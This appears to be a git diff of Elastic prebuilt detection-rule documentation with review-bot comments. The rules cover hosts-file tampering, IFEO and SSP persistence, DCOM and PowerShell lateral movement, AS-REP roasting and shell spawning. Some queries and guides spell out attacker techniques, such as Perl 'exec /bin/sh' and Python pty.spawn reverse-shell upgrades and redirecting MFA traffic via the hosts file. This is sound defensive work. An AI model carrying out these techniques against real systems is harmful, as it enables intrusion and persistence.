@@ -0,0 +1,125 @@ +[[prebuilt-rule-8-10-5-hosts-file-modified]] +=== Hosts File Modified + +The hosts file on endpoints is used to control manual IP address to hostname resolutions. The hosts file is the first point of lookup for DNS hostname resolution so if adversaries can modify the endpoint hosts file, they can route traffic to malicious infrastructure. This rule detects modifications to the hosts file on Microsoft Windows, Linux (Ubuntu or RHEL) and macOS systems. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-reference-yml.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: Windows +* OS: macOS +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Hosts File Modified + +Operating systems use the hosts file to map a connection between an IP address and domain names before going to domain name servers. Attackers can abuse this mechanism to route traffic to malicious infrastructure or disrupt security that depends on server communications. For example, Russian threat actors modified this file on a domain controller to redirect Duo MFA calls to localhost instead of the Duo server, which prevented the MFA service from contacting its server to validate MFA login. 
This effectively disabled MFA for active domain accounts because the default policy of Duo for Windows is to "Fail open" if the MFA server is unreachable. This can happen in any MFA implementation and is not exclusive to Duo. Find more details in this [CISA Alert](https://www.cisa.gov/uscert/ncas/alerts/aa22-074a). + +This rule identifies modifications in the hosts file across multiple operating systems using process creation events for Linux and file events in Windows and macOS. + +#### Possible investigation steps + +- Identify the specifics of the involved assets, such as role, criticality, and associated users. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the changes to the hosts file by comparing it against file backups, volume shadow copies, and other restoration mechanisms. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and the configuration was justified. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Consider isolating the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. 
+- Review the privileges of the administrator account that performed the action. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where + + /* file events for creation; file change events are not captured by some of the included sources for linux and so may + miss this, which is the purpose of the process + command line args logic below */ + ( + event.category == "file" and event.type in ("change", "creation") and + file.path : ("/private/etc/hosts", "/etc/hosts", "?:\\Windows\\System32\\drivers\\etc\\hosts") and + not process.name in ("dockerd", "rootlesskit", "podman", "crio") + ) + or + + /* process events for change targeting linux only */ + ( + event.category == "process" and event.type in ("start") and + process.name in ("nano", "vim", "vi", "emacs", "echo", "sed") and + process.args : ("/etc/hosts") and + not process.parent.name in ("dhclient-script", "google_set_hostname") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Manipulation +** ID: T1565 +** Reference URL: https://attack.mitre.org/techniques/T1565/ +* Sub-technique: +** Name: Stored Data Manipulation +** ID: T1565.001 +** Reference URL: https://attack.mitre.org/techniques/T1565/001/ 
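Review bot: In the "Hosts File Modified" rule query the comment "process events for change targeting linux only" is not enforced, because the second clause has no `host.os.type == "linux"` condition; editor invocations such as `vi /etc/hosts` on macOS will also match, duplicating what the file-event clause already covers via `/private/etc/hosts`. Either add `host.os.type == "linux"` to that clause or correct the comment. Minor style point in the same clause: `event.type in ("start")` is a single-value `in` and reads more clearly as `event.type == "start"`, matching the other rules in this package.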
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hping-process-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hping-process-activity.asciidoc new file mode 100644 index 0000000000..62ccfa6766 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hping-process-activity.asciidoc @@ -0,0 +1,65 @@ +[[prebuilt-rule-8-10-5-hping-process-activity]] +=== Hping Process Activity + +Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has the ability to construct network packets for a wide variety of network security testing applications, including scanning and firewall auditing. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://en.wikipedia.org/wiki/Hping + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" +and process.name in ("hping", "hping2", "hping3") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Information Discovery +** ID: T1082 +** Reference URL: https://attack.mitre.org/techniques/T1082/ 
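Review bot: The ATT&CK mapping in the "Hping Process Activity" rule (System Information Discovery, T1082) does not match the description, which characterises hping as a packet crafting tool used for "scanning and firewall auditing"; Network Service Discovery (T1046) is the closer technique and the Discovery tactic can stay. The one-sentence description "Hping ran on a Linux host." also reads as a log line rather than a rule summary; "Identifies execution of hping on a Linux host." would match the phrasing used by the other rules in this package.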
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-image-file-execution-options-injection.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-image-file-execution-options-injection.asciidoc new file mode 100644 index 0000000000..e5901dafba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-image-file-execution-options-injection.asciidoc 
@@ -0,0 +1,88 @@ +[[prebuilt-rule-8-10-5-image-file-execution-options-injection]] +=== Image File Execution Options Injection + +The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and length(registry.data.strings) > 0 and + registry.path : ( + "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*.exe\\Debugger", + "HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*\\Debugger", + "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*\\MonitorProcess", + "HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*\\MonitorProcess", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*.exe\\Debugger", + "\\REGISTRY\\MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*\\Debugger", + 
"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*\\MonitorProcess", + "\\REGISTRY\\MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*\\MonitorProcess" + ) and + /* add FPs here */ + not registry.data.strings regex~ ("""C:\\Program Files( \(x86\))?\\ThinKiosk\\thinkiosk\.exe""", """.*\\PSAppDeployToolkit\\.*""") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Image File Execution Options Injection +** ID: T1546.012 +** Reference URL: https://attack.mitre.org/techniques/T1546/012/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc new file mode 100644 index 0000000000..3283d34f40 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc 
@@ -0,0 +1,71 @@ +[[prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node]] +=== Inbound Connection to an Unsecure Elasticsearch Node + +Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), and/or lack authentication, and are accepting inbound network connections over the default Elasticsearch port. + +*Rule type*: query + +*Rule indices*: + +* packetbeat-* +* logs-network_traffic.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-security.html +* https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-http-options.html#_send_all_headers + +*Tags*: + +* Use Case: Threat Detection +* Tactic: Initial Access +* Domain: Endpoint + +*Version*: 104 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +(event.dataset: network_traffic.http OR (event.category: network_traffic AND network.protocol: http)) AND + status:OK AND destination.port:9200 AND network.direction:inbound AND NOT http.response.headers.content-type:"image/x-icon" AND NOT + _exists_:http.request.headers.authorization + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ 
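Review bot: The "Inbound Connection to an Unsecure Elasticsearch Node" document ships an empty investigation guide: the `[source, markdown]` block contains nothing between its delimiters. Either remove the block or populate it with triage steps. The rule query also depends on `NOT _exists_:http.request.headers.authorization`, which only works when Packetbeat is configured with `send_all_headers` (the linked reference), so the description should state that prerequisite rather than leaving it implicit in a URL anchor. Style point: "Unsecure" in the title should be "Insecure".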
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc.asciidoc new file mode 100644 index 0000000000..98fb5db33b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc.asciidoc 
@@ -0,0 +1,86 @@ +[[prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc]] +=== Incoming DCOM Lateral Movement with MMC + +Identifies the use of Distributed Component Object Model (DCOM) to run commands from a remote host, which are launched via the MMC20 Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1m + [network where host.os.type == "windows" and event.type == "start" and process.name : "mmc.exe" and source.port >= 49152 and + destination.port >= 49152 and source.ip != "127.0.0.1" and source.ip != "::1" and + network.direction : ("incoming", "ingress") and network.transport == "tcp" + ] by process.entity_id + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "mmc.exe" + ] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Distributed Component 
Object Model +** ID: T1021.003 +** Reference URL: https://attack.mitre.org/techniques/T1021/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: MMC +** ID: T1218.014 +** Reference URL: https://attack.mitre.org/techniques/T1218/014/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting.asciidoc new file mode 100644 index 0000000000..20aceef39e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting.asciidoc 
@@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting]] +=== Incoming Execution via PowerShell Remoting + +Identifies remote execution via Windows PowerShell remoting. Windows PowerShell remoting allows a user to run any Windows PowerShell command on one or more remote computers. This could be an indication of lateral movement. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan = 30s + [network where host.os.type == "windows" and network.direction : ("incoming", "ingress") and destination.port in (5985, 5986) and + network.protocol == "http" and source.ip != "127.0.0.1" and source.ip != "::1"] + [process where host.os.type == "windows" and + event.type == "start" and process.parent.name : "wsmprovhost.exe" and not process.executable : "?:\\Windows\\System32\\conhost.exe"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Windows Remote Management +** ID: T1021.006 +** Reference URL: 
https://attack.mitre.org/techniques/T1021/006/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-installation-of-security-support-provider.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-installation-of-security-support-provider.asciidoc new file mode 100644 index 0000000000..b8a1c0de96 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-installation-of-security-support-provider.asciidoc 
@@ -0,0 +1,91 @@ +[[prebuilt-rule-8-10-5-installation-of-security-support-provider]] +=== Installation of Security Support Provider + +Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\Control\\Lsa\\Security Packages*", + "HKLM\\SYSTEM\\*ControlSet*\\Control\\Lsa\\OSConfig\\Security Packages*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Lsa\\Security Packages*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\Lsa\\OSConfig\\Security Packages*" + ) and + not process.executable : ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: 
+** Name: Security Support Provider +** ID: T1547.005 +** Reference URL: https://attack.mitre.org/techniques/T1547/005/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl.asciidoc new file mode 100644 index 0000000000..e4282bd01d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl.asciidoc 
@@ -0,0 +1,63 @@ +[[prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl]] +=== Interactive Terminal Spawned via Perl + +Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. + +*Rule type*: query + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:perl and + process.args:("exec \"/bin/sh\";" or "exec \"/bin/dash\";" or "exec \"/bin/bash\";") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python.asciidoc new file mode 100644 index 0000000000..b583da5300 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python.asciidoc 
@@ -0,0 +1,71 @@ +[[prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python]] +=== Interactive Terminal Spawned via Python + +Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and +( + (process.parent.name : "python*" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", + "fish") and process.parent.args_count >= 3 and process.parent.args : "*pty.spawn*" and process.parent.args : "-c") or + (process.parent.name : "python*" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", + "fish") and process.args : "*sh" and process.args_count == 1 and process.parent.args_count == 1) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Python +** ID: T1059.006 +** Reference URL: https://attack.mitre.org/techniques/T1059/006/ 
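Review bot: in the Interactive Terminal Spawned via Python hunk, the shell list `("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")` and the `process.parent.name : "python*"` test are repeated verbatim in both branches of the `or`, so the next edit to one list will drift from the other; hoist them out as `process.parent.name : "python*" and process.name in (...) and ((process.parent.args_count >= 3 and process.parent.args : "*pty.spawn*" and process.parent.args : "-c") or (process.args : "*sh" and process.args_count == 1 and process.parent.args_count == 1))`, which is logically identical and easier to maintain.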
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user.asciidoc new file mode 100644 index 0000000000..9da4a58931 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user.asciidoc 
@@ -0,0 +1,127 @@ +[[prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user]] +=== Kerberos Pre-authentication Disabled for User + +Identifies the modification of an account's Kerberos pre-authentication options. An adversary with GenericWrite/GenericAll rights over the account can maliciously modify these settings to perform offline password cracking attacks such as AS-REP roasting. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://harmj0y.medium.com/roasting-as-reps-e6179a65216b +* https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738 +* https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0026_windows_audit_user_account_management.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring +* Data Source: Active Directory + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Kerberos Pre-authentication Disabled for User + +Kerberos pre-authentication is an account protection against offline password cracking. When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. 
If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password. Microsoft's security monitoring [recommendations](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738) state that `'Don't Require Preauth' – Enabled` should not be enabled for user accounts because it weakens security for the account’s Kerberos authentication. + +AS-REP roasting is an attack against Kerberos for user accounts that do not require pre-authentication, which means that if the target user has pre-authentication disabled, an attacker can request authentication data for it and get a TGT that can be brute-forced offline, similarly to Kerberoasting. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Determine if the target account is sensitive or privileged. +- Inspect the account activities for suspicious or abnormal behaviors in the alert timeframe. + +### False positive analysis + +- Disabling pre-authentication is a bad security practice and should not be allowed in the domain. The security team should map and monitor any potential benign true positives (B-TPs), especially if the target account is privileged. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Reset the target account's password if there is any risk of TGTs having been retrieved. +- Re-enable the preauthentication option or disable the target account. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. 
+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.code:4738 and winlog.api:"wineventlog" and message:"'Don't Require Preauth' - Enabled" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal or Forge Kerberos Tickets +** ID: T1558 +** Reference URL: https://attack.mitre.org/techniques/T1558/ +* Sub-technique: +** Name: AS-REP Roasting +** ID: T1558.004 +** Reference URL: https://attack.mitre.org/techniques/T1558/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected.asciidoc 